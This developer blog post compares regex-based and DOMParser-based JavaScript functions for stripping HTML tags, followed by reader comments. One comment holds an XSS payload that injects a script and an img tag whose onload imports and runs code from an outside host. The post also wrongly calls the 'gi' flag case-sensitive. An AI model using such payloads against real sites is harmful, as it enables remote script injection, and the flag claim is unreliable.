Alvison Hunter Arnuero | Front-End Web Developer

Posted on Jul 13, 2022 • Edited on Jun 8, 2024

Removing HTML Tags with RegEx or using DOMParser() using JavaScript.

#webdev #programming #javascript #regex

Howdy folks! Have you ever needed to sanitize strings containing HTML tags in server responses? Let me show you two methods to do this using JavaScript.

In one of my past projects working with a Translation app, we sent data from the Zendesk platform to our app and then to the Deepl Translator API to get English translations from various languages. The strings received from Zendesk contain HTML tags in ASCII/Symbol format (e.g., <h2>Server Response</h2>), and the Deepl Translator API sometimes returns these tags in HTML format (e.g.,

Server Response

While these formats are technically the same, they cause issues when comparing strings to avoid repetitions in the translated text container in the UI.

To address this, I extract only the plain text from the string received from Zendesk, as the client wants a text-only display. Using the replace method, I can remove the HTML tags from the string.

Allow me to introduce two straightforward methods to accomplish this task. While both methods are effective, I'll outline the advantages and disadvantages of each to help you make an informed decision:

First Version

/**
* Returns a string containing plain text format
* @constructor
* @param {string} strToSanitize - String to be sanitized
*/
export const clearHTMLTags = (strToSanitize) => {
  return strToSanitize.replace(/(<([^>]+)>)/gi, '');
}

Pros:

Simple and straightforward.
Uses a regular expression to remove HTML tags.

Cons:

Regular expressions can be brittle and may not cover all edge cases.
Can be problematic with nested tags or malformed HTML.
Not the most secure method for handling HTML content.

The function uses a regular expression, /(<([^>]+)>)/gi, to capture all opening and closing HTML tags within a given string. The 'gi' modifier ensures a case-sensitive search for all occurrences of the pattern in the string. Using the replace method with this regex and an empty string as the replacement effectively removes all HTML tags from the string, producing a sanitized version suitable for plain text display.

However, this approach may not handle complex scenarios with nested tags perfectly, potentially leading to unexpected results. To ensure comprehensive HTML tag removal, especially in such cases, a more robust and efficient solution is recommended.

Second Version

/**
* Returns a string containing plain text format by removing HTML tags
* @param {string} strToSanitize - String to be sanitized
* @returns {string} - Sanitized plain text string
*/
const betterClearHTMLTags = (strToSanitize) => {
  try {
    let myHTML = new DOMParser().parseFromString(strToSanitize, 'text/html');
    return myHTML.body.textContent || '';
  } catch (error) {
    console.error("Error parsing HTML string:", error);
    return '';
  }
}

let myHTML = `<!--  don't > use Regex --><h1>Testing without Regex</h1>`

console.log(
  betterClearHTMLTags(myHTML)
)
// output: Testing without Regex

Pros:

Uses the DOMParser API, which is designed to parse HTML and XML.
Handles nested tags and malformed HTML more gracefully.
Safer and more reliable for sanitizing HTML content.

Cons:

Slightly more complex than using a regular expression.
Depends on the availability of the DOMParser API (which is available in most modern browsers and Node.js environments with JSDOM or similar libraries).

Function Enhancements
The second version, betterClearHTMLTags, is more accurate and follows best practices for the following reasons:

Accuracy: It correctly handles nested and malformed HTML tags, which can be problematic for regular expressions.
Security: It's safer to use a built-in HTML parser than relying on regular expressions, which can be error-prone.
Robustness: It ensures that all HTML entities are correctly interpreted and converted to plain text.

Error Handling: Adding basic error handling to ensure robustness.

Well, Folks, I trust you'll find these functions invaluable for extracting plain text from HTML tags in your projects. Thank you for reading, and I sincerely hope you found this article as enjoyable to read as it was for me to write. Stay tuned for more insightful content in the future!

❤️ Enjoyed the article? Your feedback fuels more content.
💬 Share your thoughts in a comment.
🔖 No time to read now? Well, Bookmark for later.
🔗 If it helped, pass it on, dude!

Top comments (4)

Frank Wisniewski • Jul 13 '22 • Edited

Never use Regex to parse HTML

const clearHTMLTags = (strToSanitize) => {
  return strToSanitize.replace(/(<([^>]+)>)/gi, '');
}
let myHTML = `<!--  don't > use Regex --><h1>Test</h1>`

console.log(
  clearHTMLTags(myHTML)
)
// output: use Regex -->Test


// The right way

const betterClearHTMLTags = (strToSanitize) => {
  let myHTML = new DOMParser()
    .parseFromString(strToSanitize, 'text/html');
    return myHTML.body.textContent || '';
}
console.log(
  betterClearHTMLTags(myHTML)
)
 // output: Test

Alvison Hunter Arnuero | Front-End Web Developer • Jul 13 '22 • Edited

Awesome! This is an excellent approach, let me share it in the post if you don't mind and refer your profile as a reference. Thanks for this, pal!

Samuel Eiche • Jun 7 '23 • Edited

That wont work for sth like

betterClearHTMLTags(`\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>`)

JWP • Jul 13 '22

Not for me